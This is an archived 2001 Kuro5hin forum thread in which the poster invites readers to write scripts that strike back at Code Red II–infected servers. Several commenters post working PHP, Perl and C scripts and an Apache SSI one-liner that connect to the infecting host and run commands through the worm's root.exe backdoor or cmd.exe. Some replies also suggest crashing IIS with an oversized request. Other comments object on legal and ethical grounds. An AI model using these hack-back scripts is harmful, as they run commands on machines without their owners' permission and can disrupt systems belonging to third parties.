Kuro5hin.org: technology and culture, from the trenches
create account | help/FAQ | contact | links | search | IRC | site news
[ Everything | Diaries | Technology | Science | Culture | Politics | Media | News | Internet | Op-Ed | Fiction | Meta | MLP ]
We need your support: buy an ad | premium membership

[P]
Code Red II retaliation Competition...

By neuneu2K in Internet
Wed Aug 08, 2001 at 12:53:39 PM EST
Tags: Security (all tags)
Security

I propose a coding "challenge" to all programmers on K5:

Make a script that kills Code Red (I and/or II) infected machines


Inoshiro has posted one in his diary but I do not seem to be able to download it !

The terms of the "challenge" are in this order:

  • should NOT format the drive of the poor S.O.B. or otherwise destroy important data
  • should stop the infection action
  • should inform the poor luser that he was infected
  • should be anonymous (this could be illegal)
  • should patch the server
  • should install
    • (emacs)
    • (a JRE)
    • (perl)
    • (python)
    • (none of the above)

    (Vote in the poll !)

Of course, it is not needed to do all this to apply, in fact a simple script that sends "NET STOP W3SVC" to infected servers is trivial but efficient as a first act !

This post should not be taken as representing any advice to break the law of your community. :-)

Sponsors

Voxel dot net
o Managed Hosting
o VoxCAST Content Delivery
o Raw Infrastructure

Login

Poll
Software to install ?
o GNU Emacs 11%
o Sun JRE 6%
o Perl 8%
o Python 6%
o Other (please comment) 4%
o None, you bastard script kiddiot ! 62%

Votes: 270
Results | Other Polls

Related Links
o diary
o Also by neuneu2K


Display: Sort:
Code Red II retaliation Competition... | 156 comments (150 topical, 6 editorial, 0 hidden)
First (informal...) Submissions (3.25 / 8) (#1)
by neuneu2K on Wed Aug 08, 2001 at 06:06:45 AM EST

As Seen in Inoshiro's Diary (some people here do not read Inoshiro's Diary... the pagans !), there is something even more simple then NET STOP W3svc...

hulver said :
You would be better of just sending back a GET default.ida?X where X is any character x 5000 This will cause the Web server to segfault. Unfortunatly W2k will just restart it, but it will be without the Codered worm in memory. Until it gets hit again that is.

PS :FIRST POST !


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
PC world [offtopic] (2.80 / 5) (#15)
by garlic on Wed Aug 08, 2001 at 08:39:34 AM EST

So in our more PC world today, more and more insults get taken away from us. Isn't insulting someone by calling them a pagan an insult to people who identify themselves as pagan, like ElectricAngst?

I know I would have been mildly annoyed if you had instead said ... the homos !). Oh well.

HUSI challenge: post 4 troll diaries on husi without being outed as a Kuron, or having the diaries deleted or moved by admins.
[ Parent ]

Grr (none / 0) (#80)
by QuoteMstr on Wed Aug 08, 2001 at 04:59:35 PM EST

It was meant in jest, like the Church of Emacs. :P

[ Parent ]
[meta] I rated you zero because: (3.00 / 2) (#90)
by Inoshiro on Wed Aug 08, 2001 at 06:43:31 PM EST

I don't want to see that first post shit. Leave it at the door. Or take it to where noise is the rule.



--
[ イノシロ ]
[ Parent ]
no problem... (none / 0) (#106)
by neuneu2K on Thu Aug 09, 2001 at 02:34:27 AM EST

I knew the risks :-)
But I think that in a comment with content and noise...
Well I whould have rated 1 !
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Danger Will Robinson!!!! (3.29 / 17) (#2)
by Carnage4Life on Wed Aug 08, 2001 at 06:11:56 AM EST

Please do not do this. I repeat, Please do not do this if you don't want to end up like the guy in the story below

A 'White Hat' Goes to Jail

That is why it is anonymous :-) (3.50 / 4) (#3)
by neuneu2K on Wed Aug 08, 2001 at 06:21:30 AM EST

More seriously, I was not thinking of a worm, only of a retaliating script, I think it is more moral than suing the owners of all the IPs that "attack" my server (Yes, I could do that legally !).

The guy the article you link to talks about is not really a white hat in my book... leaving a backdoor is not the mark of an honorable security concious white hat, tricking kiddiots into jail is not really moral (I hate these too... but they ARE kids !)
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Not quite (3.66 / 6) (#4)
by John Milton on Wed Aug 08, 2001 at 06:22:16 AM EST

He didn't just fix the systems. He left a back door into them. That's a little bit different. Besides, there's no harm in creating such a worm. As long as you don't use it, I don't see the problem.


"When we consider that woman are treated as property, it is degrading to women that we should Treat our children as property to be disposed of as we see fit." -Elizabeth Cady Stanton


[ Parent ]
not exactly white hat (4.71 / 7) (#11)
by delmoi on Wed Aug 08, 2001 at 07:44:34 AM EST

That guy installed a back door on the machines he infected. He also wrote a worm, not just a remote disinfecter. What this guy is asking for is just something that would kill the attacking worm on someone elses machine if they tried to connect to you. Which meains that they're already trying to hack your computer.

Installing something like a JRE might be crossing the line -- you could screw something up (what if they'd written some m$ dependant java, what if it stopped working?) -- but just removing the worm and poping up a message box letting them know probably wouldn't get you put in jail.

I mean, if you saw a fire in someone's house and ran in to try to put it out, I seriously doubt you'd got to jail.
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
I don't think this will be a good solution (3.10 / 10) (#5)
by BobRoy on Wed Aug 08, 2001 at 06:53:15 AM EST

What gives us the rights to break in to the systems just because they are infected? This will make us no better than the author of the Code red worms.

Hopefully the poor sysadmins will soon patch their systems. Even tough they should have done it weeks ago.

Even if the admins doesn't keep their systems up to date, I find it hard to support this kind of actions.

If it's wet, Drink it!


Self Defense (5.00 / 1) (#60)
by Sikpup on Wed Aug 08, 2001 at 02:10:28 PM EST

If you are attacked, you have the right to defend yourself. As long as you aren't doing additional damage, you should be ok.

Someone assualts you outside a bar. You can legally defent yourself with force. If you cross the line so that the assailant becomes the defendant, you are in trouble.

So if the parallel holds, defusing the assault is fine, but then using the server to spread further would expose you to the same liability that the server owner currently holds


[ Parent ]
Here is mine... (4.75 / 16) (#6)
by Scott Robinson on Wed Aug 08, 2001 at 06:53:53 AM EST

Well, here is what is currently running on my web server. All thanks should go to a friend of mine for the initial script/framework:

scott@asuka:/var/www$ cat default.ida
<?php
header("HTTP/1.0 400 You are infected with Code Red II");
?>

<html>
<title>Code Red Alert</title>

<?php
$res = "dirty\r\n";
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);

if (!$fp)
{
echo "I tried to disinfect you, but couldn't connect: $es ($en)\r\n";
}
else
{
fputs($fp, "GET /scripts/root.exe?/c+net+send+localhost+\"Your+computer+is+infected+with+Code+Red+2.+See+www.incidents.org+for+instructions+on+how+to+remove.\" HTTP/1.0\r\n\r\n");
fclose($fp);

$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
fputs($fp, "GET /scripts/root.exe?/c+explorer+http://www.cert.org/advisories/CA-2001-23.html\" HTTP/1.0\r\n\r\n");
fclose($fp);

$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
fputs($fp, "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n");

echo "I tried to disinfect you, and the server started to say:";
echo "\r\n<h2>\r\n";
echo $res = fgets($fp,1024);
echo "</h2> $SERVER_SIGNATURE";

fclose($fp);
}

$log = fopen("/tmp/redalert.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

</html>
scott@asuka:/var/www$


I like this one... (3.00 / 2) (#7)
by neuneu2K on Wed Aug 08, 2001 at 07:16:45 AM EST

But, the comments in the reply are NEVER going to be read !

I would add two lines to stop and restart the server (remove the worm from RAM)...
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Net send winbox 'message' (3.60 / 5) (#10)
by delmoi on Wed Aug 08, 2001 at 07:40:04 AM EST

Will pop a diolog box up on the machine of the user. 'net send localhost' will pop a message box up on the current machine.
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
Ok, let me see if I have this clear: (3.50 / 2) (#12)
by Scott Robinson on Wed Aug 08, 2001 at 08:27:21 AM EST

I'm all for improving my notification:

Instead of my current "c+net+send+localhost+" I should use "c+net+send+winbox+"?

I've also heard of "c+net+send+%MACHINENAME%+"

Scott.


[ Parent ]
no, no, you had it right (4.00 / 2) (#26)
by delmoi on Wed Aug 08, 2001 at 10:43:06 AM EST

My windows machine is called 'takinara' if I did

net send takinara hello

I woudl get 'hello' on my screen. takinara is the WINS/Samba name of the box, I could also use my IP address or domain name to send the message. The way you had it, with 'localhost' works fine (I tried it), it'll send to the machine that the commend is run *on* I.E. the infected machine.
--
"'argumentation' is not a word, idiot." -- thelizman
[ Parent ]
net send * msg ? (3.66 / 3) (#32)
by nstenz on Wed Aug 08, 2001 at 11:00:55 AM EST

If I do a NET SEND * "Hello.", I get a message on my screen. I think * might be something like "send to all local users". That works for me. What do you think?

Of course, it is just as easy to use whatever flag in cmd.exe to turn on macro substitution and use the machine name. However, this way saves a little bit of bandwidth... and a little bandwidth to a few hundred thousand machines could be quite a bit in the end. =)

[ Parent ]

Re: Ok, let me see if I have this clear: (3.00 / 1) (#38)
by elemental on Wed Aug 08, 2001 at 11:17:46 AM EST

That should actually be:

c+net+send+%computername%+whatever_message

--
I love my country but I fear my government.
--> Contact info on my web site --


[ Parent ]
Warn the DOMAIN (4.00 / 1) (#94)
by SEWilco on Wed Aug 08, 2001 at 07:30:35 PM EST

It seems like a good idea to "net send %DOMAIN%", so every MS box on the LAN gets a warning. This increases the chance that someone will notice the message, rather than it sitting on the screen of a server in a closet. (In PHP, I think that would be "\%DOMAIN\%")

Also, after the initial socket connection succeeds, change the "dirty" label to something like "warned", so the log shows which ones are likely to have succeeded. Actually, of course, each socket connection attempt should be tested for errors; it's just good programming practice, and particularly relevant when talking to an unstable remote machine.

[ Parent ]

not a good idea (3.00 / 1) (#98)
by janra on Wed Aug 08, 2001 at 09:17:43 PM EST

It seems like a good idea to "net send %DOMAIN%", so every MS box on the LAN gets a warning.

That isn't a good idea, at least when it comes to ISP domains - lately most of my code-red hits have been coming from [MAC address].bconnected.net. (a residential DSL provider) Using your idea would have everybody, even those running windows 95 (i.e., with no services) getting the message, when somebody they know nothing about and can't complain to anyways is the one who is infected.


--
Discuss the art and craft of writing
That's the problem with world domination... Nobody is willing to wait for it anymore, work slowly towards it, drink more and enjoy the ride more.
[ Parent ]
Re: not a good idea (3.00 / 1) (#100)
by Mulad on Wed Aug 08, 2001 at 09:22:30 PM EST

I think that the `net send' commands use Windows NetBIOS names and domains. %DOMAIN% would be the Windows domain, which is usually something very different than the DNS domain. Might also work with %WORKGROUP%, though I'm not even sure if such a variable exists..

[ Parent ]
But! (4.00 / 2) (#13)
by Scott Robinson on Wed Aug 08, 2001 at 08:28:38 AM EST

Wouldn't the first line that stopped the server then disable myself from sending back a message to restart it?

Scott.


[ Parent ]
doh ! (3.00 / 2) (#14)
by neuneu2K on Wed Aug 08, 2001 at 08:34:46 AM EST

you are right of course...
It must kill the server so that it will be automagically restarted (but without the worm...).


On another thread... "net send localhost" is good, since it is executed on the infected machine.
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
at? (none / 0) (#144)
by Jeff Mahoney on Fri Aug 10, 2001 at 06:23:01 PM EST

Windows 2000 includes UNIX-style 'at' as part of the default install. I don't believe WinNT does. If you get a Win2k system, you could schedule an "at" job to run, in say, a minute or so that restarts the web server -- and then shut the web server down. It'll come back up automagically in a minute. :) -Jeff

[ Parent ]
NT+AT (none / 0) (#153)
by b0fh on Wed Aug 15, 2001 at 09:49:23 PM EST

Yes, NT does have an AT engine (the service is called "scheduler". Sadly, it is usually disabled, it seems that the installer marks its startup as "manual".
--
--
"Contrary to popular belief, UNIX is user-friendly. It just happens to be selective on who it makes friendship with"
[ Parent ]
Very quick question (3.00 / 2) (#47)
by fluffy grue on Wed Aug 08, 2001 at 12:13:43 PM EST

I've never configured PHP before... how do I get Apache to run this script as a PHP?
--
"Is not a quine" is not a quine.
I have a master's degree in science!

[ Hug Your Trikuare ]
[ Parent ]

It depends... (none / 0) (#50)
by neuneu2K on Wed Aug 08, 2001 at 12:55:55 PM EST

Hard way is: recompile apache with php !
Easy way is: Your distribution includes apache preconfigured with PHP :-)... you just drop the file !

I am no php god... So I cannot help you very much :-(
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Um, see... (3.00 / 1) (#52)
by fluffy grue on Wed Aug 08, 2001 at 01:07:12 PM EST

I did try just dropping it in on my Debian system (yes, I installed and configured the php3 package). I guess I could add a PHP handler for .ida files... not like I need that extension for anything else. :)
--
"Is not a quine" is not a quine.
I have a master's degree in science!

[ Hug Your Trikuare ]
[ Parent ]

Okay (4.00 / 1) (#53)
by fluffy grue on Wed Aug 08, 2001 at 01:14:03 PM EST

I just kludged it with AddType application/x-httpd-php3 .ida and that made it work. Whee.
--
"Is not a quine" is not a quine.
I have a master's degree in science!

[ Hug Your Trikuare ]
[ Parent ]

anyone wanna help me port this to Perl? (4.00 / 1) (#77)
by Justinfinity on Wed Aug 08, 2001 at 04:52:49 PM EST

running with CGI::* preferably for maximun portability. Heck, get people with patched IIS servers to run it with ActivePerl if possible!

i'm gonna give it a try, but i haven't done that much (any :-P) network stuff with Perl.

find the results on my coding page

-Justin
Why don't you listen to me? If you listen, you get some of that clean, refreshing, new world water.
ok bye
:wq


[ Parent ]
sure... (3.00 / 1) (#102)
by janra on Wed Aug 08, 2001 at 09:38:01 PM EST

But with the same caveats as to my perl skills. I was thinking the other day about how to contact the machines that are filling up my log files, and this seems like a great way to do it.

PS: justinfinity.2y.net isn't responding at the moment...


--
Discuss the art and craft of writing
That's the problem with world domination... Nobody is willing to wait for it anymore, work slowly towards it, drink more and enjoy the ride more.
[ Parent ]
Perl port (4.00 / 1) (#103)
by Count Zero on Wed Aug 08, 2001 at 10:03:16 PM EST

Ok.... Didn't use CGI:: though.

#!/usr/bin/perl

use IO::Socket;

sub open_sock {
   my $mysock = new IO::Socket::INET (
   PeerAddr => "$ENV{'REMOTE_ADDR'}",
      PeerPort => '80',
      Proto => 'tcp'
               );
   die "Tried to warn you, but could not connect</body></html> $!\n" unless $mysock;
   $mysock->autoflush(1);
   return $mysock;
}

print "Content-type: text/html\n\n";
print <<EOF;
<html>
<head>
<title>Code Red!</title>
</head>
<body>
EOF

$sock = &open_sock;
print $sock "GET /scripts/root.exe?/c+net+send+localhost+\"Your+computer+is+infected+with+Code+Red+2.+See+www.incidents.org+for+instructions+on+how+to+remove.\" HTTP/1.0\n\n";
close($sock);

$sock = &open_sock;
print $sock "GET /scripts/root.exe?/c+explorer+http://www.cert.org/advisories/CA-2001-23.html HTTP/1.0\n\n";
close($sock);

$sock = &open_sock;
print $sock "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\n\n";
close($sock);

print <<EOF;
You have hopefully been alerted to the code red infection
</body>
</html>
EOF

open (CR_LOG, ">>/tmp/code_red.log");
$date = `/bin/date`;
print CR_LOG "$ENV{'REMOTE_ADDR'} - $date\n";
close CR_LOG;

exit;


[ Parent ]
doesn't work... (4.00 / 1) (#108)
by janra on Thu Aug 09, 2001 at 03:25:53 AM EST

As nebby pointed out in this comment, the worm's copy of root.exe does not appear to allow shutting down of the server and other neat tricks. I checked this, by trying to access the web server of the computers who had scanned me after I put this script (slightly modified to shut down the server rather than rename root.exe) up and activated it, and they were still up and serving web pages.

Fortunately, there may be an alternative: according to the incidents.org Code Red II page, the worm protects itself from deactivation via an admin simply deleting root.exe by also mapping the C:\ and D:\ directories to server.name/c and server.name/d respectively - so someone can get in via server.name/c/winnt/system32/cmd.exe (or whatever the path is to cmd.exe). I substituted /c/winnt/system32/cmd.exe for /scripts/root.exe and of the three that have hit my script in the few minutes since I changed it, two give me a 'TCP connect failed ... broken pipe' error when I try to hit their webserver. Hopefully that means their webserver is shut down. (Am I right?)


--
Discuss the art and craft of writing
That's the problem with world domination... Nobody is willing to wait for it anymore, work slowly towards it, drink more and enjoy the ride more.
[ Parent ]
my cable died last night (none / 0) (#122)
by Justinfinity on Thu Aug 09, 2001 at 03:03:03 PM EST

so i couldn't update anything. but when i get back from work today (~11 PM EST) i'll take another stab at it

-Justin
Why don't you listen to me? If you listen, you get some of that clean, refreshing, new world water.
ok bye
:wq


[ Parent ]
Hmm. (4.00 / 1) (#101)
by Mulad on Wed Aug 08, 2001 at 09:33:05 PM EST

Well, two things.

First, You should probably only have your script run when you detect that it was triggered by a Code Red II-infected system. Look at the $QUERY_STRING variable and see if it starts with an `X' or three..

Second, trying to send the message to `localhost' will not work. You need to send it to the NetBIOS name of the computer, %COMPUTERNAME%, instead. URL-encode the percent signs and you end up with `%25COMPUTERNAME%25'

[ Parent ]

my script (3.00 / 2) (#105)
by Mulad on Wed Aug 08, 2001 at 11:57:11 PM EST

Here's my script. It doesn't do anything other than a `net send'.

<?php

/* Make sure we're dealing with Code Red II */
if (substr ($QUERY_STRING, 0, 4) == "XXXX")
{
/* Open a connection to the offender */
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
/* Check to see if the connection actually opened */
if ($fp)
{
/* URL-encode the message... */
$string = urlencode("net send %COMPUTERNAME% WARNING: The Code Red II worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system. Visit http://www.incidents.org/react/code_redII.php for more information.");
/* ...and send it */
fputs ($fp, "GET /scripts/root.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
fclose ($fp);
}
}
else
{
/* Just for fun and confusion.. */
header ("HTTP/1.0 404");

/* Standard 404 page */
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n");
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL $SCRIPT_NAME was not found on this server.<p>\n");
echo ("<hr>\n");
echo ("<address>Apache/1.3.19 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
echo ("</body></html>\n");
}

?>


[ Parent ]
in C (5.00 / 1) (#129)
by ramble on Fri Aug 10, 2001 at 12:41:02 AM EST

/*
Default.ida to warn code red losers.

Step 1: Compile it
most systems: cc -o default.ida default.ida.c
Solaris: cc -o default.ida default.ida.c -lnsl -lsocket

Step 2: Put default.ida in your www root

Step 3: add something like this to your httpd.conf

AddHandler cgi-script .ida
<Directory "/var/apache/htdocs/">
Options ExecCGI
Order allow,deny
Allow from all
</Directory>

Step 4: restart apache.
*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

const char *netmsg = "GET /scripts/root.exe?/c+net+send+localhost+Your+computer+
is+infected+by+the+Code+Red+Worm.+Please+go+to+http://www.microsoft.com/+and+fix
+it. HTTP/1.0\r\n\r\n";

int
main()
{
struct sockaddr_in server;
struct hostent *hostname;
char *infected_host;
int result;
int fd;


printf ("Content-type: text/html\n\n");

infected_host = getenv ("REMOTE_ADDR");

if (infected_host == NULL)
exit (1);

hostname = gethostbyname (infected_host);

if (hostname == NULL)
exit (1);

memset (&server, 0, sizeof (struct sockaddr_in));
server.sin_family = AF_INET;
server.sin_port = htons (80);
memcpy (&server.sin_addr, hostname->h_addr, sizeof (struct in_addr));

fd = socket (AF_INET, SOCK_STREAM, 0);

if (fd < 0)
exit (1);

result = connect (fd, (struct sockaddr *) &server, sizeof (server));

if (result != 0)
exit (1);

write (fd, netmsg, strlen (netmsg));
close (fd);
}

Townies On Drugs
[ Parent ]
Re: in C (none / 0) (#147)
by ncc74656 on Sat Aug 11, 2001 at 06:41:15 PM EST

This is what I get when I try compiling it (on an LFS system with Linux 2.4.6):

default.ida.c: In function `main':
default.ida.c:38: storage size of `server' isn't known
default.ida.c:57: sizeof applied to an incomplete type
default.ida.c:60: sizeof applied to an incomplete type

Still a clever idea, though...I tried doing something similar, only with a shell script that called Lynx to do the dirty work. Maybe I had Apache set up improperly; I'll look at that part of your post and see if I can get something going that way.

[ Parent ]

Re: in C (none / 0) (#148)
by ncc74656 on Sat Aug 11, 2001 at 07:23:26 PM EST

Turned out that it was easier to get the job done with SSI than CGI...maybe that's just the way my server is set up. Anyway, if you're already using server-side includes, try this:
  1. Edit your httpd.conf so that .ida is accepted:
    1. search for "AddType text/html .shtml"
    2. skip to the next empty line
    3. add these lines:
      AddType text/html .ida
      AddType server-parsed .ida
  2. Restart Apache.
  3. Create default.ida in your default htdocs directory with something like this in it:
    This server runs Apache. It is immune to Code Red.
    <!--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+is+infected+with+the+CodeRed2+worm.+Please+fix+it+ASAP.%22 -->
That should send out a popup every time an infected server contacts your server.

(BTW, it looks like K5 breaks long lines in posts, just like /. Make sure you reassemble the <!--#exec directive so it's all on one line ending in -->.)

[ Parent ]

"Don't do it" (4.16 / 12) (#8)
by jesterzog on Wed Aug 08, 2001 at 07:30:21 AM EST

Officially I'm always going to say that nobody should do this. Breaking into someone else's machine to fix a problem without asking their permission just seems plain wrong, as several other people have already said in this discussion. I wouldn't want anyone to do it to my system.

Unofficially I have to admit that I'm hoping someone will do it anyway. Either that, or ISP's should be pressured to disconnect customers who aren't doing anything about their excess annoying traffic.

Especially for people living outside the states, Code Red isn't just making the web go slower - it's costing everyone lots of money.

I'm not sure what the standard system is in the states, but where I am in New Zealand the typical high bandwidth pricing system is traffic based, and you have to pay just as much for receiving traffic as for sending it. Because most of the traffic is international (which is where all the good stuff is), the cost is significantly higher than the US and probably Europe.

The consultant guy next to where I work went away for a few days holiday just before Code Red was announced, and came back to a $3000 (about $US1500) ISP bill. Even with patched or unaffected servers it's not good, though. There's also no shortage of people here getting hit several times a second and having to pay for it. It's all adding up, and is pretty bad.


jesterzog Fight the light


you are right about the ISP (2.66 / 3) (#9)
by neuneu2K on Wed Aug 08, 2001 at 07:35:12 AM EST

I asked my ISP to just disconnect the infected servers...
I have had no answer yet...

Remember, technically if your Infected server trys (good luck !) to infect my server...

You are breaking the law too !

- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
ISPs (4.00 / 2) (#39)
by finial on Wed Aug 08, 2001 at 11:31:01 AM EST

The problem is that ISPs aren't going to take (and haven't) taken the time to disconnect individual infected systems. What they do is a wholesale disable of port 80 (in this case) or whatever it is that is causeing the problem. (As discussed on slashdot). That is, they disable it for everyone, infected or not. Not a good solution for anyone.

[ Parent ]
now I am afraid... (3.50 / 2) (#40)
by neuneu2K on Wed Aug 08, 2001 at 11:36:08 AM EST

Very afraid !
The value of my DSL line goes down a lot for me if they block 80 !
- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Cox (roadrunner) has (2.00 / 1) (#51)
by wiredog on Wed Aug 08, 2001 at 12:58:25 PM EST

I think. The story here

If there's a choice between performance and ease of use, Linux will go for performance every time. -- Jerry Pournelle
[ Parent ]
Why not? (none / 0) (#124)
by kimbly on Thu Aug 09, 2001 at 03:57:49 PM EST

Breaking into someone else's machine to fix a problem without asking their permission just seems plain wrong, as several other people have already said in this discussion. I wouldn't want anyone to do it to my system.

Why not? Consider an example from a different domain: There have been several times when I've been walking to my house late at night and come across a parked car with one door slightly open. The interior lights of the car are on because the door is open. I know that if I leave the car alone, it will fail to start in the morning because the battery will be dead. So I close the door. How is this any different?

Consider another example. I live in an appartment building, and once I was walking down the hall and came across an apartment where someone had left their keys in the door. I knocked on their door to let them know this, but they were in the shower. So I opened the door, layed the keys inside on the floor, and then closed the door. I ended up leaving it unlocked of course, but it was practically unlocked before, anyway.

[ Parent ]

I still have mixed feelings, because (none / 0) (#130)
by jesterzog on Fri Aug 10, 2001 at 05:50:10 AM EST

Well the difference from that point of view, at least from my perspective, is that you're not actually closing the door for any server except one of them. Instead you're releasing a viral infection into the air that disperses through the district (or world), shutting any door that it sees. The key point is that it's not under your control.

Actually most of my problem is about releasing a viral type of fix, which isn't necessarily what you're talking about. I'll explain it anyway.

The other problem is that there's no objective notification that people actually want their doors closed. The door might be open, but that doesn't mean Code Red can get it. If it's someone who doesn't trust the provided Microsoft door barricade, they might have instead decided to get a giant, code red eating dog and stach it in the bushes for when Code Red comes along.

The bottom line is that you don't have legal permission to close someone's door for them, as stupid as it sounds. Certainly if you go on a door-closing vigilante romp through town, someone might take issue with you entering their property and "adjusting" it in the light of telling them what's good for them.

Finally, there's still all the traffic problems that it would create for a while, hitting lots of completely secure systems. They would just find it annoying, and might take offence.

I still have mixed feelings about it, anyway. I'm sure it's possible to go on arguing and drawing analogies for both points of view. I don't think it's an ethically right thing to do, but I wouldn't complain much if someone did it.


jesterzog Fight the light


[ Parent ]
install apache ;-) (2.33 / 12) (#16)
by dof on Wed Aug 08, 2001 at 08:49:01 AM EST

then there would be no problems! :))

dof.
http://www.codepoets.co.uk
I run apache :-) (1.75 / 4) (#17)
by neuneu2K on Wed Aug 08, 2001 at 08:54:26 AM EST

All they are infecting are my logs ...

It is a technical violation of the law... they are "trying" to "hack" my machine, the fact that they can not (not this way...) does not change a lot !


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
me too! (1.50 / 4) (#27)
by jbridge21 on Wed Aug 08, 2001 at 10:48:22 AM EST

Installing Apache would be best.

[ Parent ]
Huh? (3.40 / 10) (#18)
by RangerBob on Wed Aug 08, 2001 at 09:15:19 AM EST

Ok, so we complain about people that spend their time cracking into machines. We also complain about how much bandwidth is wasted because all of the currently infected Code Red machines. So...our solution is to write something that cracks into the machines and wastes bandwidth trying to find them??? While it's a noble idea to want to fix other people's machines, come on. In the end you'd just be doing the same thing you're complaining about in the first place.

The other problem is that, while I hate to say it, you can't help someone become a better sysadmin by going behind their backs and fixing problems for them. If something like this idea did become acceptable, all you'd be doing is encouraging lazy admins because they'd say "Hey, why should I do anything since some white hat worm will fix it for me."

Honestly, I'll admit that a part of me hopes that this worm will continue for a while. I'm finally seeing non-techie types start to catch on that Microsoft products generally are buggy and have security flaws. Non-techies are finally making the connection that Microsoft made both Outlook and IIS, two things that are just security breaches waiting to happen. In the agency I work for, the Dilbertian managers and techs are finally starting to stop their bitching about things like Linux and open source software because of all the recent Microsoft problems. It's also raising awareness about how critical it is to always keep up with your updates.

Err, I do not think they are "admins" (3.75 / 4) (#19)
by neuneu2K on Wed Aug 08, 2001 at 09:19:46 AM EST

Most of the infected machines are home users who installed Win2000 (probably a unlicenced copy) and never used IIS...

Moreover, what I propose is not to hunt down and destroy the infected machines...
Only the ones who "attack" us !

And reading my logs (all i need to find infected machines) does not waste bandwidth, and sending a few kb to a machine to stop it from sending multi megabytes of XXXXX does not waste bandwidth either !


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Then how are they infected.... (2.33 / 3) (#24)
by RangerBob on Wed Aug 08, 2001 at 10:26:31 AM EST

So how are they infected if they're not running IIS? Wouldn't it be kinda hard for them to be "infected" by an IIS exploit if they're not running IIS? :)

Admittedly, I misunderstood how you intended to find the machines, but I still don't think that it justifies cracking into a machine, even if it's to fix it.


[ Parent ]
they are not knowingly running IIS... (4.00 / 2) (#25)
by neuneu2K on Wed Aug 08, 2001 at 10:35:24 AM EST

Most of the times, it only serves the default IIS page ...
On the subject of cracking their machines... I think it is a lesser evil than leaving open machines on the Internet, ready to DDoS anybody...

Just suppose you are DDoSed by a cluster of about 100000 machines (about the number a normal kiddiot could scan and control in a few hours), these machines would deplete your Bandwidth quota in seconds, indept you of millions of dollars in minutes and then, if your hosting provider is not cool, YOU would go to jail for not paying !

Now, do you think that this is better then forcebly "curing" the infected servers ?


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
Hrm (3.00 / 1) (#43)
by RangerBob on Wed Aug 08, 2001 at 11:53:58 AM EST

Millions of dollars in minutes? Wow, I guess I need to quit what I'm doing and go to an isp since that sounds even better than being a Psychic Friend :) And no, I don't think I'd go to jail for being the victim of a DDOS. I'd really like to see your example for that one because I don't quite remember seeing someone go to jail for being at the receiving end of a DDOS. And, if it serves the default IIS page, it'd have to be running IIS. My reply was half in jest, since you acted like a machine not running IIS could still be infected by an IIS worm.

And even after all of this aggression, and wierd examples like the above, you still haven't answered the point of don't you think it's a double standard to bitch about someone else's worm that cracks machine while writing your own to also crack machines, even if it's for "noble" purposes.

[ Parent ]
Yes... there is a double standard ! (3.00 / 2) (#49)
by neuneu2K on Wed Aug 08, 2001 at 12:50:50 PM EST

That is because it is not the same thing:

  • "My" script only "attacks" machines who are participating in an illegal action
  • My script does not use the "attacked" machine to propagate: it does not use resources of the machine, does not potentially cost money to the owner of the machine and does not make him an accomplice in an illegal action
  • My script does not augment the number of people with administrative right to the machine, it restores the administrative rights to the ones given by the owner

If you think that big ISPs have it easy on the cost of international links... well I am not stopping you from being an ISP :-)


- "And machine code, which lies beneath systems ? Ah, that is to do with the Old Testament, and is talmudic and cabalistic..." - Umberto Eco
[ Parent ]
wasted bandwidth (4.25 / 4) (#20)
by klamath on Wed Aug 08, 2001 at 09:31:03 AM EST

So...our solution is to write something that cracks into the machines and wastes bandwidth trying to find them???
No -- at last count, more than 1 thousand unique hosts have tried to attack my Apache server using the Code Red exploit. If I had setup a script to connect back and patch the infected server, not only would those 1,000+ servers be fixed, but they would not have the opportunity to infect other hosts, and so on. And because the fixed hosts will no longer be scanning (and on the 20th, DOS'ing), a lot of bandwidth will be saved. The actual bandwidth used by connecting back and shutting down the attacker is miniscule.

[ Parent ]
Continuing for a while... (none / 0) (#63)
by topham on Wed Aug 08, 2001 at 02:33:13 PM EST

As long as this damn virus continues my network connection is threatened. I rely on it for work.

And there is nothing I can do to change that.

